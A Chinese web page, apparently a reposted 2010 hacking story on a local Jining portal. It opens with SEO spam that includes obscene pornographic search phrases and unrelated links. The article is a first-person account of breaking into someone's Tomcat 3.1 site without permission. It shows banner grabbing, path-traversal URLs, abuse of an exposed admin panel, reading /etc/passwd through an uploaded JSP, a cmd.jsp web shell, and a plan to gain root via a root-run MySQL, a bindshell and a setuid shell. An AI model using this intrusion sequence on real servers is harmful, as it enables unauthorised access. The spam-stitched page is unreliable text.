人禽杂交在线视频,日a本亚洲中文在线观看,亚洲日韩欧美一区二区不卡,国产亚州综合在线视频

        <s id="p3vac"></s>

          <sup id="p3vac"></sup>
          <ol id="p3vac"><i id="p3vac"></i></ol>
            1. 濟(jì)寧天氣預(yù)報(bào)
              濟(jì)寧市人力資源和社會(huì)保障局
              濟(jì)寧人事考試單位代碼
              濟(jì)寧市安全教育平臺(tái)
              濟(jì)寧違章查詢
              濟(jì)寧住房公積金查詢
              濟(jì)寧科技網(wǎng) 濟(jì)寧培訓(xùn)班 濟(jì)寧銀行網(wǎng)上銀行 濟(jì)寧教育網(wǎng) 歷史故事 家庭教育 濟(jì)寧市地圖 濟(jì)寧房產(chǎn) 濟(jì)寧教育網(wǎng) 濟(jì)寧人事考試信息網(wǎng) 濟(jì)寧新聞網(wǎng)
              幣圈最新消息 濟(jì)寧信息港
              瀏覽器之家 濟(jì)寧汽車(chē) 睡前小故事
              下載吧 股票書(shū)籍 花花草草
              百應(yīng)百科 照片恢復(fù) 學(xué)習(xí)通
              紅警之家 睡前小故事 馬伊琍
              手機(jī)照片恢復(fù) 手機(jī)數(shù)據(jù)恢復(fù)

              黑客攻擊技術(shù) WEB網(wǎng)站入侵的全過(guò)程講述

              時(shí)間:2010-09-09 18:31來(lái)源:未知 damoshentu.com

              以下的文章主要向大家講述的是黑客攻擊技術(shù)WEB網(wǎng)站入侵的過(guò)程,很偶然的一個(gè)機(jī)會(huì),看到了一個(gè)網(wǎng)站,頁(yè)面清新也很舒服的感覺(jué)。網(wǎng)站是用JSP開(kāi)發(fā)的,由于個(gè)人的喜好,所以我決定看看系統(tǒng)的安全性。

              1. telnetwww.target.com8080 GET/CHINANSLHTTP/1.1
              2. [Enter] [Enter]
              3. 返回的結(jié)果如下: HTTP/1.0404NotFound
              4. Date:Sun,08Jul200107:49:13GMT Servlet-Engine:TomcatWebServer/3.1(JSP1.1;Servlet2.2;Java1.2.2;Linux2
              5. .2.12i386;java.vendor=BlackdownJava-LinuxTeam) Content-Language:en
              6. Content-Type:text/html Status:404
              7. Error:404 Location:/CHINANSLFileNotFound/CHINANSL

              我獲得了運(yùn)行的WEBServer的名稱"Tomcat 3.1"。我記得我曾經(jīng)發(fā)現(xiàn)過(guò)這個(gè)版本的漏洞,并且post到bugtrap上去過(guò)。大概是:通過(guò)".."技術(shù)可以退出WEB目錄,于是:

              1. http://target:8080/../../../../%00.jsp(不行) http://target:8080/file/index.jsp(不行)
              2. http://target:8080/index.JSP(不行) http://target:8080/index.jsp%81(不行)
              3. http://target:8080/index.js%70(不行) http://target:8080/index.jsp%2581(不行)
              4. http://target:8080/WEB-INF/(不行)

              嗯,在試試吧!Tomcat 3.1自帶了一個(gè)管理工具,可以查看WEB下的目錄及文件,并且可以添加context.試一下:http://target:8080/admin/ ,管理員果然沒(méi)有刪除或禁止訪問(wèn)這個(gè)目錄。接著我點(diǎn)"VIEW ALL CONTEXT"按鈕,列出了WEB目錄下的一些文件和目錄的名稱,我開(kāi)始仔細(xì)的看了起來(lái),一小會(huì)兒,發(fā)現(xiàn)了一個(gè)上傳文件的組件,嘿嘿,寫(xiě)一個(gè)jsp文件弄上去看看。幾口咖啡的時(shí)間,我寫(xiě)了這么一個(gè)東東出來(lái):

              通過(guò)上傳的組件將這個(gè)jsp上傳到對(duì)方的WEB目錄里,然后:

              http://target:8080/upload/test.jsp?file=/etc/passwd

              嘿嘿,密碼出來(lái)啦。我只看了"/etc/passwd",并沒(méi)有看"/etc/shadow",因?yàn)楫?dāng)時(shí)考慮webserver一般使用nobody的身份啟動(dòng)的,看了也白看。(失誤)接下來(lái)的過(guò)程是無(wú)聊的猜測(cè)密碼,沒(méi)有成功。算了,那我只有將就點(diǎn),反正現(xiàn)在我相當(dāng)于有了一個(gè)shell了嘛,猜不出密碼上去,那就全當(dāng)IE是我的SHELL環(huán)境吧!

              再寫(xiě):

              然后把這個(gè)jsp又通過(guò)upload上傳了上去,嘿嘿,我現(xiàn)在有個(gè)SHELL了。

              http://target:8080/upload/cmd.jsp?cmd=ls+-la+/

              (我這里就不列出來(lái)了)

              怎么獲得root呢?經(jīng)過(guò)一番搜索我發(fā)現(xiàn)了系統(tǒng)安裝了mysql并且我從jsp的源代碼中得到了mysql的密碼:)看看是什么權(quán)限運(yùn)行的mysql:

              1. sqld">http://target:8080/upload/cmd.jsp?cmd=ps+aux+ grep+mysqld

              顯示:

              1. root874940.21.9173004800p0-S28Jun015:54.72/usr/local/data/mysql

              嘿嘿,有辦法了,系統(tǒng)是以root身份運(yùn)行的mysql,同時(shí)我知道了mysql的密碼,那我現(xiàn)在我可以寫(xiě)一個(gè)shell程序,讓它c(diǎn)reate一個(gè)表,然后將我的數(shù)據(jù)放到表中,然后再使用"select ... into outfile;"的辦法在系統(tǒng)上創(chuàng)建一個(gè)文件,讓用戶在執(zhí)行su的時(shí)候,運(yùn)行我的程序。(還記得apache.org有一次被WEB網(wǎng)站入侵嗎?hacker就采用的這種辦法)。

              然后,我再上傳bindshell之類的程序,運(yùn)行、獲得nobody的權(quán)限,然后......再使用su root時(shí)幫忙創(chuàng)建的setuid shell讓自己成為root.嘿嘿,真是好辦法,我都為我的想法感到得意......

              相關(guān)閱讀
            2. 調(diào)查顯示大企業(yè)中只有33%未被黑客入侵
            3. 簡(jiǎn)述主要的黑客入侵途徑及應(yīng)對(duì)方法
            4. 通過(guò)交換機(jī)防范蠕蟲(chóng)病毒入侵
            5. 黑客攻擊和入侵的八大常用手段有哪些?
            6. 黑客捕捉技術(shù)之網(wǎng)絡(luò)入侵追蹤方法
            7. SQL注入網(wǎng)站入侵實(shí)例演示
            8. 實(shí)例講述網(wǎng)絡(luò)社會(huì)工程學(xué)
            9. 黑客入侵也無(wú)間 盜走網(wǎng)吧20萬(wàn)

            10. 上一篇:手動(dòng)防御傳奇攻擊問(wèn)題
              下一篇:閃存驅(qū)動(dòng)器攻擊介質(zhì)仍受黑客青睞

              濟(jì)寧運(yùn)河畔網(wǎng)版權(quán)與免責(zé)聲明:

              ①凡本網(wǎng)來(lái)源于注明來(lái)“源于:運(yùn)河畔或damoshentu.com”版權(quán)均屬運(yùn)河畔網(wǎng)所有,其他媒體可以轉(zhuǎn)載,且需注明“來(lái)源運(yùn)河畔網(wǎng)”
              ② 凡本網(wǎng)注明“來(lái)源:XXX(非濟(jì)寧運(yùn)河畔,濟(jì)寧信息港)”的作品,均轉(zhuǎn)載自其它媒體,轉(zhuǎn)載目的在于傳遞更多信息,并不代表本網(wǎng)贊同其觀點(diǎn)和對(duì)其真實(shí)性負(fù)責(zé)。
              ③ 如因作品內(nèi)容、版權(quán)和其它問(wèn)題需要同本網(wǎng)聯(lián)系的,請(qǐng)?jiān)?0日內(nèi)進(jìn)行。

              • 全網(wǎng)熱點(diǎn)
              • 健康
              • 教育
              • 新聞
              • 美食